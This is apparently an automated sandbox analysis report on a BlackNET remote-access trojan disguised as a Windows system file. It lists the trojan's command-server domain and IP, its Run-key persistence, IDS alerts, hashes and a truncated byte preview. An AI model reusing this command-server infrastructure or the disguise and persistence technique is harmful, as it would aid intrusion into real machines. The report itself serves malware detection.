                                          • URL Reputation: safe
                                          unknown
                                          http://gpay-safe.ru4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.679709753.0000000002F6C000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.699597146.0000000002EA1000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.urwpp.deDPlease4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.zhongyicts.com.cn4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.apache.o4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.646554695.000000001BECF000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sakkal.com4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown

                                          Contacted IPs


                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | true
91.206.93.216 | gpay-safe.ru | Russian Federation | 49392 | ASBAXETNRU | true

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:471063
                                          Start date:25.08.2021
                                          Start time:00:48:16
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 9s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:34
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@32/11@5/3
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 5.2% (good quality ratio 3.2%)
                                          • Quality average: 48.9%
                                          • Quality standard deviation: 42.5%
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 179
                                          • Number of non-executed functions: 1
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.50.102.62, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.210.154
                                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                          Simulations

                                          Behavior and APIs

Time | Type | Description
00:49:12 | API Interceptor | 2x Sleep call for process: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe modified
00:49:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
00:49:17 | API Interceptor | 3x Sleep call for process: winhost.exe modified
00:49:21 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe

                                          Joe Sandbox View / Context

                                          IPs

Match | Associated Sample Name / URL | Detection | Context
1.1.1.1 | INVOICE_90990_PDF.exe | malicious | www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
1.1.1.1 | Go.exe | malicious | 1.1.1.1/
1.1.1.1 | QQ9.0.1.exe | malicious | url-quality-stat.xf.qq.com/Analyze/Data?v=1&&format=json&&qq=0&&cmd=21&&product=qqdownload

                                          Domains

Match | Associated Sample Name / URL | Detection | Context
gpay-safe.ru | mixinte_20210821-092359(1).exe | malicious | 91.206.93.216

                                          ASN

Match: CLOUDFLARENETUS

Associated Sample Name / URL | Detection | Context
Ti0Llyz763.exe | malicious | 104.21.70.98
VibR4H3H85.exe | malicious | 104.26.13.31
OBL PN210700369.pdf.exe | malicious | 104.21.19.200
I7nOSnzON0.exe | malicious | 162.159.133.233
DUE SOA.exe | malicious | 23.227.38.74
ATT65197.htm | malicious | 104.16.19.94
ATT58761.html | malicious | 104.16.19.94
tiS0LFl5Cd.exe | malicious | 162.159.135.233
ATT43313.html | malicious | 104.16.18.94
n038rUglDh.exe | malicious | 162.159.129.233
VXS0UU2rgK.exe | malicious | 162.159.135.233
Fax-Rec'd - EFT Remittance - Doc -Tuesday, August 24, 2021-5560.htm | malicious | 104.16.19.94
Billing & Check#001021.html | malicious | 104.16.18.94
EPQKBK4yHX.exe | malicious | 172.67.179.123
9eRCbmFknk.exe | malicious | 104.23.99.190
SafeCrypt-Portable-win64-1.3.0.80.exe | malicious | 1.3.0.80
mQri1JxNdQ.exe | malicious | 104.17.29.11
kumv6tI8h6.exe | malicious | 172.67.188.154
nE0BePfCtd.exe | malicious | 172.67.216.236
4fPLarwmk4.exe | malicious | 104.26.13.31

Match: ASBAXETNRU

Associated Sample Name / URL | Detection | Context
j349f5iJEd | malicious | 2.56.240.65
DUsM8INDiD.exe | malicious | 185.191.34.170
cfcb21c8c129c8c2c525ecfac8bd883260eda6038e399.exe | malicious | 185.191.34.170
MeQcP3Csz5 | malicious | 195.133.192.48
0QhtHx4znu | malicious | 195.133.192.48
mixinte_20210821-092359(1).exe | malicious | 91.206.93.216
dark.arm7 | malicious | 212.196.181.159
94VG.arm | malicious | 212.193.8.17
sora.arm7 | malicious | 212.196.181.183
TFb80WLdbo.exe | malicious | 185.191.34.170
mcQMknyBg0.exe | malicious | 185.191.34.170
am2zWv3TtG.exe | malicious | 185.191.34.170
bDCLrONExt.exe | malicious | 185.191.34.170
y1FOl1vVPA.exe | malicious | 185.191.34.170
31K61e3kyI.exe | malicious | 185.191.34.170
EMI3KjRHWs.exe | malicious | 185.191.34.170
4VVvnNObjp.exe | malicious | 185.191.34.170
TFmQ9XI1Pa.exe | malicious | 185.191.34.170
uX24M5IH33.exe | malicious | 185.191.34.170
uGnsgIUjBz.exe | malicious | 185.191.34.170

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.log
                                          Process:C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):1046
                                          Entropy (8bit):5.260701310698336
                                          Encrypted:false
                                          SSDEEP:12:Q3LaJcP0/9UkB9t0kaHYGLi1B01kKVdisk70OAEaAN0hK9C4XXhK9yi0z6+xai0r:ML2pBLaYgioQxAfAiK/XhKoRL+r
                                          MD5:E374C1DD777BBD7BD346BC6677EF6864
                                          SHA1:5D6CD3DC97DA1FC6EA2BDD0E3DF84BB4CDE305F8
                                          SHA-256:150A0F0A59A04F7023A5F7E8C1739949B1CD40D15550FDBC58F7616AF24E2A30
                                          SHA-512:AB0F378628DCE34C1341583749E879EBA40FCD525977A642D0623E53DD174EDB53D061C29AE585244537BDFB6E469A590D954FE291F83154829B1937FD273670
                                          Malicious:true
                                          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Runtime.Remo#\bc6a0a01a7bd9d05ca132f229184fce6\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\93e312980de126a432df42707b07336c\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\ae8d6eb6689c9ca2
                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\winhost.exe.log
                                          Process:C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1046
                                          Entropy (8bit):5.260701310698336
                                          Encrypted:false
                                          SSDEEP:12:Q3LaJcP0/9UkB9t0kaHYGLi1B01kKVdisk70OAEaAN0hK9C4XXhK9yi0z6+xai0r:ML2pBLaYgioQxAfAiK/XhKoRL+r
                                          MD5:E374C1DD777BBD7BD346BC6677EF6864
                                          SHA1:5D6CD3DC97DA1FC6EA2BDD0E3DF84BB4CDE305F8
                                          SHA-256:150A0F0A59A04F7023A5F7E8C1739949B1CD40D15550FDBC58F7616AF24E2A30
                                          SHA-512:AB0F378628DCE34C1341583749E879EBA40FCD525977A642D0623E53DD174EDB53D061C29AE585244537BDFB6E469A590D954FE291F83154829B1937FD273670
                                          Malicious:false
                                          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Runtime.Remo#\bc6a0a01a7bd9d05ca132f229184fce6\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\93e312980de126a432df42707b07336c\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\ae8d6eb6689c9ca2
                                          C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe
                                          Process:C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):78336
                                          Entropy (8bit):5.573626199522469
                                          Encrypted:false
                                          SSDEEP:1536:rRJABDWoKGVG6BOiBQAh4QiObju5FBHIIMLtfn:dJ3GVGdiBQAeQiObjsFBHIbl
                                          MD5:BC15770F9C1C0735CB5CC9D800476AB0
                                          SHA1:7700F53B4DE7ABCD0AA28A1989F73AAD394B49BB
                                          SHA-256:4054EE21CBFC210489F119C2D717CA1AE43129FC0D07AEFE322FABB3B61D079F
                                          SHA-512:1073A97FBD39F6D96B05D8A52F8D1E9759B879D9FCF4089F1159A3CBED55E0CA6B3DA529DF09BAE0F1C37C259C482C7E56D279E7C0AFA58C6F3CBAFF615762D4
                                          Malicious:true
                                          Yara Hits:
• Rule: SUSP_Modified_SystemExeFileName_in_File, Description: Detects a variant of a system file name often used by attackers to cloak their activity, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Florian Roth
                                          • Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Florian Roth
                                          • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Florian Roth
                                          • Rule: HKTL_NET_GUID_BlackNET, Description: Detects VB.NET red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Arnim Rupp
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Joe Security
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: Metadefender, Detection: 56%, Browse
                                          • Antivirus: ReversingLabs, Detection: 85%
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.._.................&..........~D... ........@.. ...............................'....@.................................(D..S....`............................................................................... ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B................`D......H..........P...........h...p............................................0..........(....(.......(.....o....*......................(......o......o......o......o....*F.(....o....o....*..(....*.s.........s.........s.........s.........s.........*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0............{....(...+}.....{....*...{....3.*.,.r...ps....z..|....o...+*...0................,.........o....9....~.
                                          C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe:Zone.Identifier
                                          Process:C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview: [ZoneTransfer]....ZoneId=0
                                          \Device\Null
                                          Process:C:\Windows\System32\PING.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):279
                                          Entropy (8bit):4.814768129371003
                                          Encrypted:false
                                          SSDEEP:6:PzXULmWxHLTpUryacsW3CNcwAFeMmvVOIHJFxMVlmJHaVFSILP8v:P+pTpcxcsTDAFSkIrxMVlmJHaVov
                                          MD5:95A097C89A9D2D1AB477B4F65F864DBB
                                          SHA1:1089E7F3A9342C44AEBD959E3C211AC4C609882F
                                          SHA-256:3F96951AAEE3A5420B6DBD4045C6E8DD246BB661695B47B952C2083E267337A2
                                          SHA-512:DE2BB1C4A1D75BD64CF46187A713F2A0768F6F01E5C2022E7E5498E99478662B519DC1825EA280B799745EE3F7604B273CB56B9B6CE89B2EFF244393D822682C
                                          Malicious:false
                                          Preview: ..Pinging 1.1.1.1 with 32 bytes of data:..Reply from 1.1.1.1: bytes=32 time=21ms TTL=57....Ping statistics for 1.1.1.1:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 21ms, Maximum = 21ms, Average = 21ms..

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):5.573626199522469
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          File size:78336
                                          MD5:bc15770f9c1c0735cb5cc9d800476ab0
                                          SHA1:7700f53b4de7abcd0aa28a1989f73aad394b49bb
                                          SHA256:4054ee21cbfc210489f119c2d717ca1ae43129fc0d07aefe322fabb3b61d079f
                                          SHA512:1073a97fbd39f6d96b05d8a52f8d1e9759b879d9fcf4089f1159a3cbed55e0ca6b3da529df09bae0f1c37c259c482c7e56d279e7c0afa58c6f3cbaff615762d4
                                          SSDEEP:1536:rRJABDWoKGVG6BOiBQAh4QiObju5FBHIIMLtfn:dJ3GVGdiBQAeQiObjsFBHIbl
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.._.................&..........~D... ........@.. ...............................'....@................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x41447e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x5F9CBA43 [Sat Oct 31 01:13:39 2020 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v2.0.50727
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al

                                          Data Directories

                                          Name | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x14428 | 0x53 | .text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x68e | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x18000 | 0xc | .reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                          Sections

                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                          .text | 0x2000 | 0x12484 | 0x12600 | False | 0.426246279762 | data | 5.6461905054 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc | 0x16000 | 0x68e | 0x800 | False | 0.35595703125 | data | 3.63711189569 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc | 0x18000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          Name | RVA | Size | Type | Language | Country
                                          RT_VERSION | 0x160a0 | 0x404 | data | |
                                          RT_MANIFEST | 0x164a4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                          Imports

                                          DLL | Import
                                          mscoree.dll | _CorExeMain

                                          Version Infos

                                          Description | Data
                                          Translation | 0x0000 0x04b0
                                          LegalCopyright | Microsoft Corporation. All rights reserved.
                                          Assembly Version | 10.0.18362.1
                                          InternalName | svchost.exe
                                          FileVersion | 10.0.18362.1
                                          CompanyName | Microsoft Corporation
                                          Comments | Host Process for Windows Services
                                          ProductName | Microsoft Windows Operating System
                                          ProductVersion | 10.0.18362.1
                                          FileDescription | Windows Update Assistant
                                          OriginalFilename | svchost.exe

                                          Network Behavior

                                          Snort IDS Alerts

                                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                          08/25/21-00:49:10.577457 | TCP | 2029179 | ET TROJAN Win32/BlackNET CnC Keep-Alive | 49724 | 80 | 192.168.2.4 | 91.206.93.216
                                          08/25/21-00:49:12.133936 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.4 | 1.1.1.1
                                          08/25/21-00:49:12.133936 | ICMP | 384 | ICMP PING | | | 192.168.2.4 | 1.1.1.1
                                          08/25/21-00:49:12.151592 | ICMP | 408 | ICMP Echo Reply | | | 1.1.1.1 | 192.168.2.4
                                          08/25/21-00:49:15.404287 | TCP | 2029179 | ET TROJAN Win32/BlackNET CnC Keep-Alive | 49725 | 80 | 192.168.2.4 | 91.206.93.216
                                          08/25/21-00:49:16.258339 | TCP | 2029179 | ET TROJAN Win32/BlackNET CnC Keep-Alive | 49725 | 80 | 192.168.2.4 | 91.206.93.216
                                          08/25/21-00:49:17.348013 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.4 | 1.1.1.1
                                          08/25/21-00:49:17.348013 | ICMP | 384 | ICMP PING | | | 192.168.2.4 | 1.1.1.1
                                          08/25/21-00:49:17.364980 | ICMP | 408 | ICMP Echo Reply | | | 1.1.1.1 | 192.168.2.4
                                          08/25/21-00:49:25.372049 | TCP | 2029179 | ET TROJAN Win32/BlackNET CnC Keep-Alive | 49726 | 80 | 192.168.2.4 | 91.206.93.216
                                          08/25/21-00:49:27.016192 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.4 | 1.1.1.1
                                          08/25/21-00:49:27.016192 | ICMP | 384 | ICMP PING | | | 192.168.2.4 | 1.1.1.1
                                          08/25/21-00:49:27.032962 | ICMP | 408 | ICMP Echo Reply | | | 1.1.1.1 | 192.168.2.4
                                          08/25/21-00:49:29.754648 | TCP | 2029179 | ET TROJAN Win32/BlackNET CnC Keep-Alive | 49727 | 80 | 192.168.2.4 | 91.206.93.216
                                          08/25/21-00:49:30.652084 | TCP | 2029179 | ET TROJAN Win32/BlackNET CnC Keep-Alive | 49727 | 80 | 192.168.2.4 | 91.206.93.216
                                          08/25/21-00:49:31.675748 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.4 | 1.1.1.1
                                          08/25/21-00:49:31.675748 | ICMP | 384 | ICMP PING | | | 192.168.2.4 | 1.1.1.1
                                          08/25/21-00:49:31.693113 | ICMP | 408 | ICMP Echo Reply | | | 1.1.1.1 | 192.168.2.4
                                          08/25/21-00:49:34.260885 | TCP | 2029179 | ET TROJAN Win32/BlackNET CnC Keep-Alive | 49730 | 80 | 192.168.2.4 | 91.206.93.216
                                          08/25/21-00:49:35.357152 | TCP | 2029179 | ET TROJAN Win32/BlackNET CnC Keep-Alive | 49730 | 80 | 192.168.2.4 | 91.206.93.216
                                          08/25/21-00:49:37.693022 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.4 | 1.1.1.1
                                          08/25/21-00:49:37.693022 | ICMP | 384 | ICMP PING | | | 192.168.2.4 | 1.1.1.1
                                          08/25/21-00:49:37.713967 | ICMP | 408 | ICMP Echo Reply | | | 1.1.1.1 | 192.168.2.4

                                          Network Port Distribution

                                          TCP Packets

                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Aug 25, 2021 00:49:10.365606070 CEST | 49724 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:10.462574005 CEST | 80 | 49724 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:10.462688923 CEST | 49724 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:10.466486931 CEST | 49724 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:10.563071012 CEST | 80 | 49724 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:10.563898087 CEST | 80 | 49724 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:10.577456951 CEST | 49724 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:10.675556898 CEST | 80 | 49724 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:10.724242926 CEST | 49724 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:12.321815968 CEST | 49724 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:12.420679092 CEST | 80 | 49724 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:12.474530935 CEST | 49724 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:12.948219061 CEST | 49724 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:15.214610100 CEST | 49725 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:15.305600882 CEST | 80 | 49725 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:15.305686951 CEST | 49725 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:15.306813002 CEST | 49725 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:15.397294044 CEST | 80 | 49725 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:15.397839069 CEST | 80 | 49725 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:15.404287100 CEST | 49725 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:15.495248079 CEST | 80 | 49725 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:15.537134886 CEST | 49725 | 80 | 192.168.2.4 | 91.206.93.216
